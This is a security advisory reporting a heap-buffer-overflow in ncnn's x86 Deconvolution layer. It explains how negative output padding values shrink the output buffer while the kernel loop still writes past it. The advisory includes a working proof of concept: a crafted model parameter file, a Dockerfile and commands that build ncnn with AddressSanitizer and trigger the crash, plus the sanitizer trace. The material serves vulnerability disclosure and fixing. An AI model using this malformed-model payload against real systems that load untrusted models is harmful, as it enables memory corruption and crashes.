Heap Overflow in Deconvolution Output Traversal
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/deconvolution_x86.cpp:387 in Deconvolution_x86::forward
Sanitizer verdict: heap-buffer-overflow
Summary
A crafted ncnn model can hand Deconvolution a negative output_pad_right/output_pad_bottom (param ids 18/19) that cancels a large kernel extent, so the x86 implementation allocates a 1x1 output plane and then runs its col2im accumulation over the full 17x17 kernel footprint. The accumulating store at src/layer/x86/deconvolution_x86.cpp:387 walks well past the output allocation, corrupting heap memory and aborting the process. The PoC reaches it through ncnnoptimize, which executes the whole graph inside ModelWriter::shape_inference().
Detail
Deconvolution::load_param() accepts output_pad_right (id 18) and output_pad_bottom (id 19) as unconstrained integers. Deconvolution_x86::forward() adds them directly to the transposed-convolution output size and uses the result to allocate the output tensor:
// src/layer/x86/deconvolution_x86.cpp:178
int outw = (w - 1) * stride_w + kernel_extent_w + output_pad_right;
int outh = (h - 1) * stride_h + kernel_extent_h + output_pad_bottom;
// src/layer/x86/deconvolution_x86.cpp:204
top_blob_bordered = top_blob;
top_blob_bordered.create(outw, outh, out_channels, out_elemsize, out_elempack, opt.blob_allocator);
The col2im stage that scatters the sgemm result back into that tensor is driven by the kernel geometry instead, not by the output geometry. For every kernel tap (u, v) it takes a base pointer outm.row(dilation_h * u) + dilation_w * v and then strides through it:
// src/layer/x86/deconvolution_x86.cpp:377
for (int u = 0; u < kernel_h; u++)
{
for (int v = 0; v < kernel_w; v++)
{
float* ptr = outm.row(dilation_h * u) + dilation_w * v;
for (int i = 0; i < h; i++)
{
for (int j = 0; j < w; j++)
{
ptr[0] += sptr[0];
Normally outw >= kernel_extent_w and outh >= kernel_extent_h guarantee that row(u) + v stays inside the plane. Negative output padding breaks that invariant. The PoC declares a 1x1x1 input and 0=1 1=17 11=17 2=1 12=1 3=1 13=1 5=0 6=289 18=-16 19=-16, so kernel_extent_w = kernel_extent_h = 17 and outw = outh = (1-1)*1 + 17 + (-16) = 1. top_blob_bordered is therefore a 1x1x1 float tensor: 16 bytes of payload, 4 bytes of refcount and the 64-byte NCNN_MALLOC_OVERREAD tail, i.e. the 84-byte region AddressSanitizer reports. The tap loop nevertheless runs u and v from 0 to 16, and since outw == 1 the address outm.row(u) + v is simply float index u + v of a one-float plane. Index 21 (reached at u = 5, v = 16) is byte offset 84 — the first address outside the allocation — and each iteration is a read-modify-write, so the over-read at line 387 is paired with an out-of-bounds store.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-overflow-in-deconvolution-output-traversal && cd ncnn-poc-heap-overflow-in-deconvolution-output-traversal
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'PARAM'
7767517
2 2
Input data 0 1 data 0=1 1=1 2=1
Deconvolution deconv 1 1 data output 0=1 1=17 11=17 6=289 18=-16 19=-16
PARAM
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0
AddressSanitizer output:
shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50e000000154 at pc 0x57f5433a42d1 bp 0x7ffcaa4652f0 sp 0x7ffcaa4652e0
READ of size 4 at 0x50e000000154 thread T0
#0 0x57f5433a42d0 in ncnn::Deconvolution_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/deconvolution_x86_avx512.cpp:387
#1 0x57f540c73f2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
#2 0x57f540c65b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#3 0x57f540cc59e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#4 0x57f540b573c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#5 0x57f540bd4eee in main /ncnn/tools/ncnnoptimize.cpp:2844
#6 0x7d1893f941c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#7 0x7d1893f9428a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#8 0x57f540b54624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x50e000000154 is located 0 bytes after 84-byte region [0x50e000000100,0x50e000000154)
allocated by thread T0 here:
#0 0x7d189460df1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x57f540be968e in fastMalloc /ncnn/src/allocator.h:62
#2 0x57f540be968e in ncnn::PoolAllocator::fastMalloc(unsigned long) /ncnn/src/allocator.cpp:159
#3 0x57f540c293a6 in ncnn::Mat::create(int, int, int, unsigned long, int, ncnn::Allocator*) /ncnn/src/mat.cpp:581
#4 0x57f54339d68d in ncnn::Deconvolution_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/deconvolution_x86_avx512.cpp:205
#5 0x57f540c73f2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
#6 0x57f540c65b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#7 0x57f540cc59e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#8 0x57f540b573c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#9 0x57f540bd4eee in main /ncnn/tools/ncnnoptimize.cpp:2844
#10 0x7d1893f941c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#11 0x7d1893f9428a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#12 0x57f540b54624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/build/src/layer/x86/deconvolution_x86_avx512.cpp:387 in ncnn::Deconvolution_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const
Credit
Zheng Yu @ DepthFirst